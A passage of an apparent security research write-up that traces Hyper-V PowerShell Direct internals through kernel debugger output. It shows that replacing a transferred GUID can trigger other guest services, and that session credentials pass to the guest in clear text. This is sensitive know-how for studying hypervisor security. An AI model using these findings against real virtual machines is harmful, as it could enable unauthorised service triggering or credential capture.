<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa806`a2b5d808 "0000}-0000"</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Nevertheless this device is not displayed in the list of child vmbus devices (we see it using !devnode 0 1). In the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\VMBus, these GUID is also absent. However DeviceInstance parameter</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">in the section HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceClasses\{ 999e53d4-3d5c-4c3e-8779-bed06ec056e1 }\##?#ACPI#VMBus#0#{999e53d4-3d5c-4c3e-8779-bed06ec056e1} matters ACPI\VMBUS\0 that completely coincides with Device Instance value of the vmbus device.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Also when Enter-PSSession is executed the vmbus!RootAddDeviceInterface function works and nt!IoRegisterDeviceInterface:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> kcn</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> # Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 nt!IoRegisterDeviceInterface</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 Wdf01000!Mx::MxRegisterDeviceInterface</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 Wdf01000!FxDeviceInterface::Register</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 Wdf01000!FxDeviceInterface::Register</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 Wdf01000!imp_WdfDeviceCreateDeviceInterface</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 vmbus!RootStartDeviceInterfaceByContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 hvsocket!VmbusTlXPartProcessNewConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 vmbus!RootNotifyDeviceInterfaceArrival</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">08 Wdf01000!FxWorkItem::WorkItemHandler</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">09 Wdf01000!FxWorkItem::WorkItemThunk</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0a nt!IopProcessWorkItem</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0b nt!ExpWorkerThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0c nt!PspSystemThreadStartup</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0d nt!KiStartSystemThread</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The last function is documented on MSDN</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS IoRegisterDeviceInterface(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PDEVICE_OBJECT PhysicalDeviceObject,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">const</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> GUID *InterfaceClassGuid,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_opt_ PUNICODE_STRING ReferenceString,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PUNICODE_STRING SymbolicLinkName</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !devobj @rcx - </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PhysicalDeviceObject</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Device object (ffffc9094ca24630) is for:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000013 \Driver\ACPI DriverObject ffffc9094cdeea00</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Current Irp 00000000 RefCount 0 Type 00000032 Flags 00001040</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SecurityDescriptor ffffb90d7d06a630 DevExt ffffc9094ce89c60 DevObjExt ffffc9094ca24780 DevNode ffffc9094cda7c50 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ExtensionFlags (0000000000) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Characteristics (0x00000180) FILE_AUTOGENERATED_DEVICE_NAME, FILE_DEVICE_SECURE_OPEN</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AttachedDevice (Upper) ffffc9094ceb4970 \Driver\vmbus</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Device queue is not busy</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dx _GUID @rdx - </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">InterfaceClassGuid</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(*((_GUID *)0xffffb90d7ed57eb0)) : {999E53D4-3D5C-4C3E-8779-BED06EC056E1} [Type: _GUID]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [<Raw View>] [Type: _GUID]</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dx _UNICODE_STRING @r8 - </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ReferenceString</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(*((_UNICODE_STRING *)0xffffb90d7ed57ec0)) : "{999e53d4-3d5c-4c3e-8779-bed06ec056e1}-{00000000-0000-0000-0000-000000000000}-0000" [Type: _UNICODE_STRING]</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When Enter-PSSession is executed in root-OS ws2_32!connect is carried out, then winhvr!WinHvPostMessage transfers the message to guest OS.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !dc @rdx – just before vmcall call (a part of a body of the message)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#227b36000 00000001 00000000 00000001 000000c4 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#227b36010 00000001 00000000 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">999e53d4 4c3e3d5c</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> .........S..\=>L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#227b36020 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">d0be7987 e156c06e</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further in guest OS as we saw, executing nt!IoRegisterDeviceInterface and nt! PnpNotifyDeviceClassChange then the trigger on start of service vmicvmsession works. But we can replace the transferred GUID on any other that will provoke start of other services which have a similar trigger. Now such services are:</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">All Hyper-V guest services</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Bluetooth Support Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows Camera Frame Server</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Human Interface Device Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Geolocation Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Microsoft Passport</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Portable Device Enumerator Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Sensor Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Sensor Monitoring Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Storage Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Touch Keyboard and Handwriting (probably)</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">From the technical point of view, we simply emulate connection of a certain device to system. Real devices are not presented and some services don’t work in such conditions and after start give the message:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="98" src="https://lh3.googleusercontent.com/3i63AZ_owCfuEeYD71zeGQ1bNLvKra0YAau3WfWVw7bkt0gz3bpqASgJ9sVZHbRITX2Lu4czegj6BlrvCPW4q2hfq00K4kv7bQF06YDiCX_81J72eT7VGl-yoKA-BKS0nLN6PK5dVKbaMHrg9A" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="229" /></span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">On Shielded VM (it is checked in the Admin-Trusted mode) the effect is similar, however the service Hyper-V Powershell Direct service will not be started.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Its interesting, that value of credentials parameter for Enter-PSSession, which is used for start of powershell.exe in guest OS, is transferred as clear text.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (emptyPassword)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HyperVSocket.Send(</span><span style="background-color: transparent; color: #2b91af; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Encoding</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.ASCII.GetBytes(</span><span style="background-color: transparent; color: #a31515; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"EMPTYPW"</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">));</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HyperVSocket.Receive(response);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> responseString = </span><span style="background-color: transparent; color: #2b91af; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Encoding</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.ASCII.GetString(response);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">else</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HyperVSocket.Send(</span><span style="background-color: transparent; color: #2b91af; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Encoding</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.ASCII.GetBytes(</span><span style="background-color: transparent; color: #a31515; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"NONEMPTYPW"</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">));</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HyperVSocket.Receive(response);</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HyperVSocket.Send(password);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HyperVSocket.Receive(response);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> responseString = </span><span style="background-color: transparent; color: #2b91af; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Encoding</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.ASCII.GetString(response);</span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In root OS: bp ws2_32!recv in powershell process context. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="202" src="https://lh4.googleusercontent.com/wjSeY5RJm4WgDUBQ7yMVuNOf32MSr2r3yZgzFYu5DBywN-6Kz4LGLwR24BDdF0L2kdVAGKAOs9KzyV9l8rvC9qXlL8CpjN504iiSM7g35QRMK5oRHUWq7HjQnXn_IWeq_7m1gUYTaoVJO-H2Fg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="352" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In guest OS bp sspicli!LogonUserExExW</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
